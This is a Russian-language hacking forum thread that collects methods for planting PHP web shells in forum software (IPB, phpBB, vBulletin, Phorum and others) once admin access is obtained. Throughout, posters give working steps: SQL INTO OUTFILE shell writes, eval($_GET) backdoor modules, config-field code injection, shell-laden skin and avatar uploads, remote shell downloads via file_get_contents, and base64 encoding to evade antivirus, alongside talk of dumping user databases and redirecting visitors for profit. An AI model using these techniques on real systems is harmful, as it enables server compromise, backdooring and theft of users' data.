Заливка шелла в Форуме
Решил собрать все вместе, да бы уменьшить бояновые темы в разделе. Все вопросы, касающиеся заливки шелла в Форуме, задаем сюда. Приветствуется помощь в наполнении темы актуальным материалом.

He11.net Forums 1 (http://forum.antichat.ru/showpost.php?p=347007&postcount=12)
Ikonboard 1 (http://forum.antichat.ru/showpost.php?p=280115&postcount=4),2 (http://forum.antichat.ru/showpost.php?p=422079&postcount=5)
IPB 1 (http://someshit.net/showthread.php?t=141),2 (http://forum.antichat.ru/thread11551-%F8%E5%EB%EB.html)
Pehota Forum 1 (http://forum.antichat.ru/showpost.php?p=473947&postcount=24)
PHPbb 1 (http://someshit.net/showthread.php?t=179),2 (http://video.antichat.ru/file160.html),3 (http://forum.antichat.ru/showpost.php?p=198446&postcount=3),4 (https://forum.antichat.ru/showpost.php?p=1176333&postcount=36)
SMDS Forum 1 (http://forum.antichat.ru/showpost.php?p=387492&postcount=20)
SMF 1 (http://forum.antichat.ru/thread43633.html)
SowiBB 1 (http://forum.antichat.ru/showpost.php?p=408126&postcount=21)
vBulletin 1 (http://someshit.net/showthread.php?t=115),2 (http://video.antichat.ru/file221.html)
VumFOrum 1 (http://forum.antichat.ru/showpost.php?p=385752&postcount=19)
WR 1 (http://forum.antichat.ru/showpost.php?p=380128&postcount=18)

© ZAMUT
----------------------------------------------------------------------
Имею полную админку в IPB 1.3, шел через смайлы не катит - ибо там стоят права на запись.. единственная папка с 777 - это uploads, так вот.. моя цель - это залить шелл в эту папку.. действия таковы.
Создаю базу..
Заливаю код
INSERT INTO `shell` bla bla..
и выдираю его в файл
SELECT ("код шела") INTO OUTFILE '/var/www/forum/uploads/counter.php';

Загвозка, в том.. что в код вставляются слешы.. из-за них не работает шел.. я уже даж делал c LINE терминатеж бай.. вообщем, не знаю, как избавится от слешей в коде. Ввиду сегодняшнего гуглежа узнал, что они находятся на уровне php.ini. Прошу помощи в составлении запроса.


added@ на запросы внимания не обращайте.. писал машинально.

Есть доступ в админку
Не могу залить шелл... пробывал через файлы... рарешил загрузку пхп, заливается но при этом он качается... есть такая функция "Потерянные вложения" не отправлял сообщение... но там ничего нет... получается сейчас на сайте уже есть шеллы нужно только узнать ссылку... была идея узнать через базу... но в ней походу нет управления с БД %)

есть конфиг... но у них phpmyadmin стоит корява.. %)
п.с. сервак на винде

Как залить шелл на vBulletin 3.6.8?
Есть полные права админа.

вообщем такая проблема у меня есть доступ к админке на IPB 2.3.5 я хочу загрузить на сайт шелл я сделал все по примеру с phtml но он открывается как текст
тогда я попробовал операцию с копированием через выполнение пхп кода
copy('T:/home/virtual/forums.xx.ru/uploads/av-4.phtml','T:/home/virtual/forums.xx.ru/uploads/av.php');
но серв 0 реакции на это подскажите в чем может быть проблема
php 5.1.6
topserver низнаю какой версии =)
Apache 2.0 Handler

Попробуй подменить путь заливки авов вместо av на cache Например....и так же лей шелл через phtml///..а пхп код не выполняет наверное потому что у тебя нету прав роот админа...а просто простой админ...

Попробуй подменить путь заливки авов вместо av на cache Например....и так же лей шелл через phtml///..а пхп код не выполняет наверное потому что у тебя нету прав роот админа...а просто простой админ...
всё равно как текст ( есть еще какиенибудь варианты ?

Если нет прав роот админа то никак ..насколько я знаю..там нИ код выполнить..нИ SQL запросы из админки..

вообщем такая проблема у меня есть доступ к админке на IPB 2.3.5 я хочу загрузить на сайт шелл я сделал все по примеру с phtml но он открывается как текст
тогда я попробовал операцию с копированием через выполнение пхп кода
copy('T:/home/virtual/forums.globallive.ru/uploads/av-4.phtml','T:/home/virtual/forums.globallive.ru/uploads/av.php');
но серв 0 реакции на это подскажите в чем может быть проблема
php 5.1.6
topserver низнаю какой версии =)
Apache 2.0 Handler
проще через шаблон
заливаешь скин, далее картинки с шеллом в скин, удаляешь скин... картинки с шеллами остаются...
если нужно скину такой скин

проще через шаблон
заливаешь скин, далее картинки с шеллом в скин, удаляешь скин... картинки с шеллами остаются...
если нужно скину такой скин
cкинь в личку пожалуйста :) а еще лучше обьясни как самому в в хмл с картинками шел добавить :rolleyes:

cкинь в личку пожалуйста :) а еще лучше обьясни как самому в в хмл с картинками шел добавить :rolleyes:
В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.

Шелл будет доступен в директории
http://site/style_images/ip.boardpr1228455805/folder_js_skin/js_skin.php

Если нет скина IP.Board Pro
делаем так:
Импорт и экспорт стилей - Импорт... - Импорт шаблонов стиля
1. Импорт шаблонов стиля
выбираем ipb_skin-ip.boardpr.xml.gz (Какую директорию с изображениями использовать в этом стиле? - Никакую)
Залили.. далее
2. Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? - там будет что-то типо IP.Board Pro)
импортировали...
опять таки заходим в настройки скина, смотрим адресс директории
http://site/style_images/ip.boardpr/folder_js_skin/js_skin.php
и не забудьте его удалить, шаблоны удалятся, а картинки нет =)


Объясняю как сделать скин с шеллами
1. Ставим себе форум.
2. Закидываем в папку forum/style_images/нужный вам скин шеллы куда вам нужно.
3. Заходим в админку форума Внешний Вид - Импорт и экспорт стилей - Экспорт...
Какой стиль экспортировать? - выбираем какой нужен
Экспорт изображений
Какие изображения экспортировать? - выбираем папку с шеллами.

http://upload.com.ua/get/900580228 - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал

зы когда заливаете шелу лучше кодируйти их в base64 дабы они не полились веб антивирусами... :)

Залез в админку буржуйского форума phpBB3 около миллиона юзеров. Хотел слить базу. Вроде все в порядке но в админке ставлю сжатие gz неканает качает несжатым. И еще трабла качает примерно 70 мегов и обрубает скачку а это примерно 130к ползователей. Причем обрубает с точностью до байта 3 раза пытался. Дамп на сервере не сохраняет видимо прав на папку нет. Есть ли возможность в последней версии phpBB3 залить шелл? Востановление базы я так понял работает только из файлов на сервере. Загрузка аватаров есть.

Сорри незаметил тему перенесите плиз.

2 schut123

Правил картинку вставлял в нее код.
Сделать можно сохранив картинку в фотошопе и открыв hiew найти мето где написанно "Photoshop ....." менял на php код. Если перед этим открыть в паинте и сохранить место сдвинется ближе к начату файла что лучше.
Загружал картинку на сервер через админку способов я помню там полно.
Потом в админке форума создавал новую задачу прописывал путь к картинке и жал выполнить.

Картинка jpg

В конфигурации можно изменить пути к директории на чтото типа ../../../../../tmp чтобы не париться с путями

Код шелла можно и без кавычек делать - например простенький -
<?php eval($_GET[5]); ?>

можно без кавычек как сказали выше можно через функцию char(), можно в HEX-формате

может кто нибудь поподробнее объяснит как залить шелл в phpbb 3.0.3

Имеется
Русский Модифицированный IPB v1.3 Final © 2003 BesTFileZ.Net & IBR Team
Аккуант гл.админа. Как залить шелл?

учимся искать: https://forum.antichat.ru/thread76949.html

не заливается через смайлы пробывал уже...и через аватары пробывал.и через бд нельзя так как нет у юзера mysql прав на запись файлов.

Подскажите пожалуйста где раздобыть актуальный шел? Искал шел от rst, но на все что я находил - ругается антивирь. :(

шел от madnet
http://madnet.name/files/1/10.html

Шелы не могут быть не актуальными. r57 юзай, ибо cyber shell

Это моё мнение

как залить шел на сервер если там стоит TB Dev SZ Edition ...... есть пасс от админки........

кто-нибудь заливал шел в 3.0.х ?
восстановление базы только из файлов на сервере (%

Имею доступ к админке phpBB 2.0.23 (обычный двиг без всяких модов), как можно залить шел, связь если чё 302-809 ;) выручайте друзья!

Народ у меня такая ПРОБЛЕМА (http://metallkonsk.narod.ru/2009-02-09_125543.jpg) с r57shell, я так понимаю мне нужен компилятор, пробовал устанавливать Денвер но не помогло, кто что посаветует?

cкорее не компилятор, а интерпретатор
денвер должен был помочь, т.к. в него php включен
ну попробуй поставить xampp или wampserver

RazyKK Замени пробел . Всё индивидуально, но попробуй например так:
ls$IFS-la

RazyKK попробуй по одному ввести, тоесть сначала which lynx потом which wget и т.д.

Заливка links
links -source "http://откуда/shell.php" > /папка/куда/shell.php

Есть доступ в админку phpBB3 .

существует ли способ залить шелл???
если да, то какой?

Есть доступ в админку phpBB3 .

существует ли способ залить шелл???
если да, то какой?

1) Вкладка общие --> Безопасность
Разрешить php в шаблонах: Да
2)Вкладка Стили --> Компоненты стилей ->> Шаблоны
С помощью встроенного редактора шаблонов выбираем файл и пишем в него:
Код:

<!-- PHP --> phpinfo(); <!-- ENDPHP -->


Далее применяем шаблон, идем на измененную страницу и видим наш php код

Этот способ описал DeepXhadow за что ему +

имея информацию настроек и тд, что можно с ней делать?

Пытаюсь залить шелл на phpbb 2.0.21. Делаю апдейт бд через админку такого рода:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;

phpinfo() выводит без проблем, а так же любую команду через eval или passthru, но только состоящую из одного слова, так как не принимает кавычки. Тоесть, passthru(ls) работает, а passthru(ls -la) уже естествено нет. Пробовал обойти эту херню всякими бэк-слэшами, не помогает...

Может кто знает как это можно обойти? Может через char() или hex как это делается в мускл?

// Все нашол!

Как в XMB из админки залить?

Подскажите, залил шелл в phpBB 2й версии, вообщем лазаю там, хотел отредить индекс, а оказалось что там стоит тип на всех файлах только для чтения видать, ибо нечего не могу отредить :/, вопрос, можно ли это как нить убрать? шелл с57

установить права доступа

как именно? ) если можно то по конкретнее )

В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.

Шелл будет доступен в директории
http://site/style_images/ip.boardpr1228455805/folder_js_skin/js_skin.php

http://upload.com.ua/get/900580228 - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал

работает отлично, спасибо =) ipb 2.3.4

Подскажите как залить шелл в пхп2 ? доступ в админку есть, проблема в том что не моуг узнать полный путь к папке форума поэтому 1й пост не какит, узнать не могу ибо почему то профили вообще не работают -_-

eR']Подскажите как залить шелл в пхп2 ? доступ в админку есть, проблема в том что не моуг узнать полный путь к папке форума поэтому 1й пост не какит, узнать не могу ибо почему то профили вообще не работают -_-
узнать путь не особая проблема:
1. поюзай гугл inurl:site.com "error"
2. просканируй сайт на дириктории (часто бывают случаи что открыты дирриктории в которых лежат php скрипты, которые при примом открытии выдают ошибку синтаксическу ну и раскрытие)
3. потыкай скрипты что кроме форумного движка стоят (если есть)
4. реверс айпи, тыкаешь другие сайты на поиск раскрытия путей (часто случается что путь выглядет /usr/home/domain.com/htdocs/; /usr/home/domain2.com/htdocs/)
включи мозги

Как залить шелл в vBulletin 3.8.1? Линки в первом посту нерабочие.

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);


потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete

в булке 3.5.1 у меня нет прав на модули и редактирование прав. ПОдскажите можно ли канибудь через стили залить или другое.

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);


потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete
А как лить шелл ? дайте приблизительную команду у меня phpinfo видит на остальные команды даже внимание обращать не хочет ((((

Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.

А как лить шелл ? дайте приблизительную команду у меня phpinfo видит на остальные команды даже внимание обращать не хочет ((((

мб винда? а ты пишешь комманды никса... попробуй весь код шелла вписать вместо eval`a , но без <? ?> потом уже загрузить шелл в какуе-то папку (которая доступна для записи)

Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.

можно так попробовать:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

Тестилось на IBP 3.0.1 nulled

шелл: http://site.ru/uploads/shell.php

PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - image/gif->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

http://site.ru/index.php?app=core&module=usercp&tab=members&area=avatar

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

http://site.ru/uploads/av-1.php3

Просто возьми готовый шел: http://autospanner.ru/menu/groovie.rar

Подскажите как залить шелл через админку FUDforum 2.7.6 :confused:

Здесь (http://forum.antichat.ru/thread58383.html) не густо :(

Есть IP.Board 2.3.6 , через шаблоны шелл залить не получается так как закрыты все папки для записи. Есть также все админы в том числе и самый первый. раньше с помощью него в настройках исполнял команду
$data=implode('',file('http://ssilka/do/shella/c99.txt'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);

Нормально было шел заливался. Но сейчас так не делается и шела нету. В чем может быть проблема, как её обойти, и какие ещё могут быть способы?
Заранее спс

есть способы заливки шелла для форума vBulletin 3.8.0 Beta 3 ?!

в smf можно сменить директорию в которую заливаются темы ? :(

как залить шелл на TorrentPier ??

Кто знает еще какие то способы заливки шелла на ipb 2.3.4 ? Через импорт изображения - не проходит - вернее шелл загружен но видимо в директории запрещено выполнение скриптов, вываливается ошибка 500 Internal Server Error, через аватару тоже не проходит - и тип файла добавил и разрешение в аватаре на этот тип добавил, но все равно не загружает.
Заранее спасибо

такой вопрос, залил шелл на IPB NULL, пытаюсь войти и выдаёт 500 Internal Server Error. В чем может быть проблема? Точнее как залить шелл не через стили

Отлично Пашкела в + 4 из 3 в держки по думаю в чем косяк, но все же

Версия: phorum-3.4.6


Copyright (C) 2000 Phorum Development Team
http://www.phorum.org


Зависимости: Нужны права админа.

Наткнулся совершенно случайно, версия оч старая, нагуглил архив, скал, стал изучать исходники, и почти сразу наткнулся на то что конфигурация форума сохраняется в PHP файл:


C:\wamp\www\phorum-3.4.6\phorum-3.4.6\admin\settings\forums.php

Что дает нам возможность внедрить в конфиги пару своих строк =)

Последние строки в конфиг файле:


// database variables

$PHORUM['DatabaseServer']='';

$PHORUM['DatabaseName']='';

$PHORUM['DatabaseUser']='';

$PHORUM['DatabasePassword']='';

?>

Чтоб не нарушить структуру файла, идем в раздел Конфигурации БД:


http://www.SITE.COM/forum/admin/index.php?page=db

В поле Password: дописываем к текущему паролю строку:


'; @eval(stripslashes($_GET['cmd'])); echo '

И получаем бэкдор по пути:


http://www.SITE.COM/forum/admin/settings/forums.php

пробывал залить шелл способом пашкеллы. phpinfo показывает, но погда уже прописываю /faq.php?e=wget линк на шелл

пишет


Parse error: syntax error, unexpected T_STRING in
public_html/faq.php(324) : eval()'d code(1) : eval()'d code on line 1

код в модуле


eval($_GET[e]);

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);

потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete


все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();

а где тут загружать шелл найти не могу. Помогите кто сталкивался

все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();
а где тут загружать шелл найти не могу. Помогите кто сталкивался


Это просто проверка рабоспособности бэкдора, чтобы получить полноценный шелл нужно взять любой шелл и залить его в txt формате в коде убрать в начале После вместо phpinfo(); вставляем

eval(file_get_contents('http://site.com/shell.txt'));

Подскажите пожалуйста как залить php шелл на vbulletin 3.xx - 4.xx очень нужно

Это просто проверка рабоспособности бэкдора, чтобы получить полноценный шелл нужно взять любой шелл и залить его в txt формате в коде убрать в начале После вместо phpinfo(); вставляем
eval(file_get_contents('http://site.com/shell.txt'));


Попробывал данный способ нечего не вышло(( показывает что маркер безопастности отсутствует после ввода пароля входа в шелл

Попробывал данный способ нечего не вышло(( показывает что маркер безопастности отсутствует после ввода пароля входа в шелл


Просто шелл залей сразу

Не понял вас. всысле залить шелл сразу?

Не понял вас. всысле залить шелл сразу?


веб-шелл на сервер залей

Ага, если было бы всё так просто. имею доступ только к админке.

Ага, если было бы всё так просто. имею доступ только к админке.


ты же писал, что


после ввода пароля входа в шелл


значит ты заливал шелл.

Заливал я на свой хостинг. как написанно в инструкции выше. лан спасибо за помощь. Все уже получилось при помощи, Google and English hack forums

ктонить помогите такая хрень вылетает при заливке через шаблон :ipb 2.3.4

"Admin CP Message

There was no content in the file to process"

типа нету ничё(

я так понял ето chmod стоит на ету дерикторию

ктонить помогите такая хрень вылетает при заливке через шаблон :ipb 2.3.4
"Admin CP Message
There was no content in the file to process"
типа нету ничё(
я так понял ето chmod стоит на ету дерикторию



[QUOTE="None"]
1.go to acp
2.click on the Tools & Settings tab
3.then click on General Configuration
4.after that browse down and look for " find Upload URL" ( here write the right url)
5.and then find this "Path to 'upload' directory" and once again write the right path.
6.ok now save the settings and try to upload a skin.
p.s
if you dont knw the right url for the step 4 and 5, they are written under the description of the title . for example:
Upload URL:
The URL to your "uploads" folder.

короче всё получилось скин залился тока теперь ещё один проблемс, Internal Server Error

Здравствуйте.Подскажите.У меня такая ситуация:Есть приличное кол-во сайтов с sql уязвимостями.Так вот,если можно приведите пример шелла,чтобы после заливки он редиректил сразу пользователей на нужную мне партнёрку.Спасибо заранее.

Есть доступ в админку Powered by phpBB 2.0.21 , Восстановление бд не работает, это не работает /showpost.php?p=198446&postcount=3 , есть еще что-то ?

vBulletin 4.1.3, админка есть, eval() прикрутил в модулях, пытаюсь лить шелл, а он мне:


Warning: file_get_contents() [function.file-get-contents]: http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in [path]/faq.php(324) : eval()'d code(1) : eval()'d code on line 1

потом в пыхинфо разглядел allow_url_fopen - Off, как я понял, это запрещает открытие файлов по урл, можно только локальные...

Есть еще какие способы?

Может можно какой файл с внедренным шеллом залить штатными методами, а потом строки вырвать уже локально?

vBulletin 4.1.3, админка есть, eval() прикрутил в модулях, пытаюсь лить шелл, а он мне:

Warning: file_get_contents() [function.file-get-contents]: http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in [path]/faq.php(324) : eval()'d code(1) : eval()'d code on line 1

потом в пыхинфо разглядел allow_url_fopen - Off, как я понял, это запрещает открытие файлов по урл, можно только локальные...
Есть еще какие способы?
Может можно какой файл с внедренным шеллом залить штатными методами, а потом строки вырвать уже локально?


Попробуй в /tmp/ залить будет ошибка?

DronS,

простой загрузчик внедри в faq.php или сразу код запакованного WSO без

угу, или же залей новый смайл с кодом шелла и проикнлудь

Попробуй в /tmp/ залить будет ошибка?


да не, такой ошибки у меня нет


Warning: file_put_contents(/блаблабла.php) [function.file-put-contents]: failed to open stream: Permission denied in [path]/faq.php(324) : eval()'d code(1) : eval()'d code on line 1

следовательно, права на запись имеются.

Но запрет открытия по урл это не решает.

DronS
,
простой загрузчик внедри в faq.php или сразу код запакованного WSO без


ок, попробую

с правами модера в булку 4.2.0 залиться вариант?

А что по поводу XF ?))))

как залить шелл в MyBB?

Здравствуйте ищю человека который сможет залить шелл на форум Ipb 2.3.6 заранее благодарен.

Очень полезная тема, спасибо)

thanks for this i will try